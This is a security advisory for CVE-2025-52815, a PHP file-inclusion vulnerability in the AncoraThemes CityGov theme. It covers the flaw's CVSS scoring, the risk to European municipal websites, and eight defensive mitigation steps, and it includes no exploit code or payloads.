CVE-2025-52815 is a high-severity vulnerability classified under CWE-98: Improper Control of Filename for Include/Require Statement in PHP Programs, commonly known as a Remote File Inclusion (RFI) or Local File Inclusion (LFI) vulnerability. This specific vulnerability affects the AncoraThemes CityGov product, versions up to 1.9. The flaw arises because the application improperly controls the filename parameter used in PHP include or require statements, allowing an attacker to manipulate the input to include arbitrary files. Although the description mentions PHP Local File Inclusion, the underlying CWE-98 typically involves scenarios where an attacker can influence the file path to include remote or local files. Exploiting this vulnerability can lead to arbitrary code execution, full system compromise, or disclosure of sensitive information by including malicious or unintended files. The CVSS v3.1 base score is 8.1, indicating a high severity with network attack vector (AV:N), high attack complexity (AC:H), no privileges required (PR:N), no user interaction (UI:N), unchanged scope (S:U), and high impact on confidentiality, integrity, and availability (C:H/I:H/A:H). No known exploits are currently reported in the wild, and no patches have been linked yet, which suggests that the vulnerability is newly disclosed and may be targeted soon. The vulnerability is critical for web servers running the CityGov theme, which is used primarily in municipal or government-related websites built on PHP platforms, possibly WordPress or similar CMS environments. Attackers exploiting this flaw can execute arbitrary PHP code remotely, leading to full server takeover, data theft, defacement, or pivoting to internal networks.

For European organizations, particularly local governments, municipalities, and public sector entities using the AncoraThemes CityGov product, this vulnerability poses a significant risk. Successful exploitation could lead to unauthorized access to sensitive citizen data, disruption of public services, and damage to the trustworthiness of government digital infrastructure. Given the high confidentiality, integrity, and availability impacts, attackers could manipulate public information, cause denial of service, or use compromised servers as a foothold for further attacks within critical infrastructure. The lack of required privileges and user interaction means attackers can exploit this remotely and autonomously, increasing the risk of widespread attacks. Additionally, the public sector in Europe is a frequent target for cyber espionage and hacktivism, making this vulnerability attractive for threat actors aiming to disrupt government operations or leak sensitive data. The absence of patches increases the window of exposure, and the high attack complexity suggests that while exploitation is not trivial, skilled attackers can leverage this flaw effectively.

Immediate mitigation steps include: 1) Restricting web server access to trusted IP addresses where possible to limit exposure. 2) Implementing Web Application Firewalls (WAFs) with custom rules to detect and block suspicious include/require parameter manipulations, such as attempts to traverse directories or include remote files. 3) Disabling allow_url_include and allow_url_fopen directives in PHP configurations to prevent remote file inclusion vectors. 4) Applying strict input validation and sanitization on any parameters used in include/require statements, ideally using whitelisting approaches to allow only known safe files. 5) Monitoring logs for unusual requests targeting include or require parameters. 6) Segregating the web server environment with least privilege principles to limit the impact of a successful exploit. 7) Contacting AncoraThemes or monitoring their official channels for patches or updates and applying them promptly once available. 8) Conducting a thorough security audit of all PHP code in the CityGov theme to identify and remediate similar unsafe file inclusion patterns. These measures go beyond generic advice by focusing on configuration hardening, proactive detection, and code-level remediation specific to this vulnerability.